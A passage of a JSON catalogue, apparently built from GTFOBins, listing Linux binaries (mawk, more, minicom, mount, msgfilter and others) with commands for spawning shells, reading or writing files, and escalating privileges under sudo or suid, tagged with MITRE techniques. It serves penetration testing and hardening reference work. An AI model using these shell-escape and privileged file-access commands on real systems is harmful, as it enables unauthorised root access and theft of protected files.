installation","aliases":[]},{"id":"gtfo:man:shell:0:suid","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:man:shell:0:unprivileged","toolId":"gtfo:man","toolName":"man","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"man '-H/bin/sh #' man","description":"This requires GNU `troff` (`groff`) to be installed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/man/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mawk:file-read:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-read:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-read:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mawk '//' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:file-write:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"mawk 'BEGIN { print \"DATA\" > \"/path/to/output-file\" }'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:sudo","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:suid","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:mawk:shell:0:unprivileged","toolId":"gtfo:mawk","toolName":"mawk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"mawk 'BEGIN {system(\"/bin/sh\")}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mawk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["awk"]},{"id":"gtfo:minicom:shell:0:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:0:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh -p`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:0:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"minicom -D /dev/null","description":"Start the following command to open the TUI interface, then:\n\n1. press `Ctrl-A o` and select `Filenames and paths`;\n2. press `e`, type `/bin/sh`, then `Enter`;\n3. Press `Esc` twice;\n4. Press `Ctrl-A k` to drop the shell.\n\nAfter the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:sudo","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:suid","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:minicom:shell:1:unprivileged","toolId":"gtfo:minicom","toolName":"minicom","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '! exec /bin/sh </dev/tty 1>/dev/tty 2>/dev/tty' >/path/to/temp-file\nminicom -D /dev/null -S /path/to/temp-file\nreset^J","description":"After the shell, exit with `Ctrl-A x`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/minicom/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:sudo","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:suid","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:file-read:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"more /path/to/input-file","description":"The file is displayed in the terminal interface.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:sudo","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:suid","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:more:shell:0:unprivileged","toolId":"gtfo:more","toolName":"more","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"more /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/more/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosh-server:shell:0:sudo","toolId":"gtfo:mosh-server","toolName":"mosh-server","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"mosh --server=mosh-server localhost /bin/sh","description":"The `mosh-server` has to be executed via `sudo`, e.g., `'--server=sudo mosh-server'`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:sudo","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:suid","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mosquitto:file-read:0:unprivileged","toolId":"gtfo:mosquitto","toolName":"mosquitto","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"mosquitto -c /path/to/input-file","description":"The file is actually parsed and the first wrong line (ending with a newline or a null character) is returned in an error message.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:mount:privilege-escalation:0:sudo","toolId":"gtfo:mount","toolName":"mount","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"mount -o bind /bin/sh /bin/mount\nmount","description":"This overrides `mount` itself with a shell (or any other executable).","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/mount/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msfconsole:inherit:0:sudo","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msfconsole:inherit:0:unprivileged","toolId":"gtfo:msfconsole","toolName":"msfconsole","name":"inherit ← irb","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"msfconsole\nirb","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:sudo","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:suid","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgattrib:file-read:0:unprivileged","toolId":"gtfo:msgattrib","toolName":"msgattrib","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgattrib -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:sudo","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:suid","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgcat:file-read:0:unprivileged","toolId":"gtfo:msgcat","toolName":"msgcat","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgcat -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgcat/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:sudo","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:suid","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgconv:file-read:0:unprivileged","toolId":"gtfo:msgconv","toolName":"msgconv","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgconv -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgconv/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:file-read:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgfilter -P -i /path/to/input-file /bin/cat","description":"The file is parsed and displayed as a Java `.properties` file. `/bin/cat` can be replaced with any other *filter* program.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:sudo","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:suid","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -p -c '/bin/sh -p 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgfilter:shell:0:unprivileged","toolId":"gtfo:msgfilter","toolName":"msgfilter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | msgfilter -P /bin/sh -c '/bin/sh 0<&2 1>&2; kill $PPID'","description":"The `kill` command is needed to spawn the shell only once. Instead of readinf from standard input, it can read files passed via the `-i` option.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:sudo","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:suid","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msgmerge:file-read:0:unprivileged","toolId":"gtfo:msgmerge","toolName":"msgmerge","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msgmerge -P /path/to/input-file /dev/null","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:sudo","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:suid","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"msguniq -P /path/to/input-file","description":"The file is parsed and displayed as a Java `.properties` file.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/msguniq/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:msguniq:file-read:0:unprivileged","toolId":"gtfo:msguniq","toolName":"msguniq","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"msguniq -P 